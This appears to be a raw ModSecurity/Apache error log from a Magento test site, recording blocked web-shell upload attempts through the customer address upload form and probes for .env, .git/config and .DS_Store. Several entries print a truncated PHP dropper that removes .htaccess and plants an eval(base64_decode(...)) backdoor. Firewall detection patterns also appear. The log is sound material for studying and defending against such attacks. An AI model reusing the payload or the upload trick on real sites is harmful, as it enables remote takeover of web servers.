[Mon Dec 01 20:38:55.286524 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.phar"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.370168 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: cr88364f428d25.php8 found within FILES:custom_attributes[country_id]: cr88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS3uz3ijrbz5Mx7E72Y8igAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/r/cr88364f428d25.phar
[Mon Dec 01 20:38:55.370895 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS3uz3ijrbz5Mx7E72Y8igAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/r/cr88364f428d25.phar
[Mon Dec 01 20:38:55.371121 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS3uz3ijrbz5Mx7E72Y8igAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/r/cr88364f428d25.phar
[Mon Dec 01 20:38:55.516292 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Rule 7fc9236c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.php8"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.516790 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.php8"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.519345 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.php8"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.519570 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.php8"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 08:48:52.465808 2025] [authz_core:error] [pid 468147] [client 209.97.180.8:57170] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 02 08:48:55.466240 2025] [:error] [pid 464904] [client 209.97.180.8:57192] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6Z5_1sLLIs2FP7Ov7OZwAAAAc"]
[Tue Dec 02 08:48:55.466514 2025] [:error] [pid 464904] [client 209.97.180.8:57192] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6Z5_1sLLIs2FP7Ov7OZwAAAAc"]
[Tue Dec 02 08:48:55.466686 2025] [:error] [pid 464904] [client 209.97.180.8:57192] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aS6Z5_1sLLIs2FP7Ov7OZwAAAAc"]
[Tue Dec 02 08:48:56.471669 2025] [:error] [pid 464253] [client 209.97.180.8:57194] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6Z6BZeztJm1Yuq3g8lrwAAAAQ"]
[Tue Dec 02 08:48:56.471902 2025] [:error] [pid 464253] [client 209.97.180.8:57194] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6Z6BZeztJm1Yuq3g8lrwAAAAQ"]
[Tue Dec 02 08:48:56.472076 2025] [:error] [pid 464253] [client 209.97.180.8:57194] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6Z6BZeztJm1Yuq3g8lrwAAAAQ"]
[Tue Dec 02 08:48:58.469034 2025] [:error] [pid 464905] [client 209.97.180.8:59656] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6Z6n9wkSayT74AmS7nvAAAAAg"]
[Tue Dec 02 08:48:58.469267 2025] [:error] [pid 464905] [client 209.97.180.8:59656] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6Z6n9wkSayT74AmS7nvAAAAAg"]
[Tue Dec 02 08:48:58.469440 2025] [:error] [pid 464905] [client 209.97.180.8:59656] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aS6Z6n9wkSayT74AmS7nvAAAAAg"]
[Tue Dec 02 14:17:05.937591 2025] [:error] [pid 464905] [client 37.112.223.135:57538] [client 37.112.223.135] ModSecurity: Rule 7fa519cafbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aS7m0X9wkSayT74AmS7n7QAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:05.938138 2025] [:error] [pid 464905] [client 37.112.223.135:57538] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aS7m0X9wkSayT74AmS7n7QAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:05.940895 2025] [:error] [pid 464905] [client 37.112.223.135:57538] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aS7m0X9wkSayT74AmS7n7QAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:05.941113 2025] [:error] [pid 464905] [client 37.112.223.135:57538] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.phar"] [unique_id "aS7m0X9wkSayT74AmS7n7QAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:15.358643 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: w788364f428d25.php8 found within FILES:custom_attributes[country_id]: w788364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS7m2_1sLLIs2FP7Ov7OoQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Tue Dec 02 14:17:15.359396 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS7m2_1sLLIs2FP7Ov7OoQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Tue Dec 02 14:17:15.359691 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS7m2_1sLLIs2FP7Ov7OoQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/w/7/w788364f428d25.phar
[Tue Dec 02 14:17:16.276894 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Rule 7fa519cafbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aS7m3P1sLLIs2FP7Ov7OogAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:16.277388 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aS7m3P1sLLIs2FP7Ov7OogAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:16.279910 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aS7m3P1sLLIs2FP7Ov7OogAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 02 14:17:16.280112 2025] [:error] [pid 464904] [client 37.112.223.135:33256] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/w/7/w788364f428d25.php8"] [unique_id "aS7m3P1sLLIs2FP7Ov7OogAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:38.580989 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Rule 7f868e964be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.phar"] [unique_id "aS_husyqeBDXRsKLZ9YijgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:38.581482 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.phar"] [unique_id "aS_husyqeBDXRsKLZ9YijgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:38.584016 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.phar"] [unique_id "aS_husyqeBDXRsKLZ9YijgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:38.584227 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.phar"] [unique_id "aS_husyqeBDXRsKLZ9YijgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:41.802745 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: l088364f428d25.php8 found within FILES:custom_attributes[country_id]: l088364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS_hvcyqeBDXRsKLZ9YijwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/0/l088364f428d25.phar
[Wed Dec 03 08:07:41.803438 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS_hvcyqeBDXRsKLZ9YijwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/0/l088364f428d25.phar
